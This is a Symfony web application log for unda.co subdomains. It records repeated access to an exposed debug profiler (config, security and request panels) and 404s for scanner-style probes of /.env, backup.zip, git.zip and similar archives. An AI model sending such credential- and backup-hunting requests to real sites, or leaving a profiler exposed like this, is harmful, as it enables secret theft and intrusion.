[2025-12-17 01:10:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 01:16:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=195.26.248.160&limit=10&method=POST","method":"GET"} []
[2025-12-17 01:16:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=195.26.248.160&limit=10&method=POST","method":"GET"} []
[2025-12-17 01:18:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"34fb9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/34fb9f?panel=twig","method":"GET"} []
[2025-12-17 01:18:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 01:23:08] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"b025a3","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/b025a3/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-17 01:23:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-17 01:25:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"34fb9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/34fb9f?panel=time","method":"GET"} []
[2025-12-17 01:25:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 01:32:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"34fb9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/34fb9f?panel=security","method":"GET"} []
[2025-12-17 01:32:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 01:39:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"34fb9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/34fb9f?panel=request","method":"GET"} []
[2025-12-17 01:39:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 01:39:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d06d99","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d06d99?panel=form","method":"GET"} []
[2025-12-17 01:39:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-17 01:45:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a73ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a73ca9?panel=twig","method":"GET"} []
[2025-12-17 01:45:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 01:51:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a73ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a73ca9?panel=time","method":"GET"} []
[2025-12-17 01:51:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 01:58:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a73ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a73ca9?panel=security","method":"GET"} []
[2025-12-17 01:58:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 02:04:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a73ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a73ca9?panel=request","method":"GET"} []
[2025-12-17 02:04:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 02:11:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a73ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a73ca9?panel=config","method":"GET"} []
[2025-12-17 02:11:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 02:12:35] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 02:12:35] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 02:14:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1db3bc","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/1db3bc?panel=dump","method":"GET"} []
[2025-12-17 02:14:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-17 02:17:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a73ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a73ca9?panel=cache","method":"GET"} []
[2025-12-17 02:17:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 02:23:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a73ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a73ca9","method":"GET"} []
[2025-12-17 02:23:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 02:25:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 02:28:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=52.167.144.161&limit=10","method":"GET"} []
[2025-12-17 02:28:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=52.167.144.161&limit=10","method":"GET"} []
[2025-12-17 02:29:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"868fab","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/868fab?panel=time","method":"GET"} []
[2025-12-17 02:29:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 02:32:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 02:32:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 02:32:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 02:32:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 02:32:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 02:32:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 02:32:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 02:32:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 02:32:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 02:36:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e39e45","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e39e45?panel=cache","method":"GET"} []
[2025-12-17 02:36:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 02:42:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e39e45","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e39e45","method":"GET"} []
[2025-12-17 02:42:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 02:48:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e39e45","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e39e45?panel=config","method":"GET"} []
[2025-12-17 02:48:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 02:53:13] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-17 02:53:13] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-17 02:53:13] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 02:53:13] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 02:53:13] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 02:53:13] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 02:53:13] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 02:53:13] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-17 02:53:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-json" (from "http://admin.unda.co/wp-json")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-json\" (from \"http://admin.unda.co/wp-json\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 02:54:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"868fab","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/868fab?panel=security","method":"GET"} []
[2025-12-17 02:54:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-17 03:00:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"868fab","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/868fab?panel=request","method":"GET"} []
[2025-12-17 03:00:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 03:06:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"868fab","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/868fab?panel=config","method":"GET"} []
[2025-12-17 03:06:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 03:07:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"337ee8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/337ee8","method":"GET"} []
[2025-12-17 03:07:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 03:13:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"868fab","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/868fab?panel=cache","method":"GET"} []
[2025-12-17 03:13:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 03:13:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 03:13:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 03:16:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 03:22:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"868fab","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/868fab","method":"GET"} []
[2025-12-17 03:22:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 03:27:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 03:29:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e39e45","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e39e45?panel=twig","method":"GET"} []
[2025-12-17 03:29:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 03:31:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"44e619","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/44e619?panel=form","method":"GET"} []
[2025-12-17 03:31:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-17 03:32:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a42ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a42ca9?panel=dump","method":"GET"} []
[2025-12-17 03:32:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-17 03:36:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e39e45","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e39e45?panel=time","method":"GET"} []
[2025-12-17 03:36:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-17 03:39:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f4dabc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f4dabc?panel=logger","method":"GET"} []
[2025-12-17 03:39:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-17 03:41:58] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 03:42:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e39e45","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e39e45?panel=request","method":"GET"} []
[2025-12-17 03:42:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
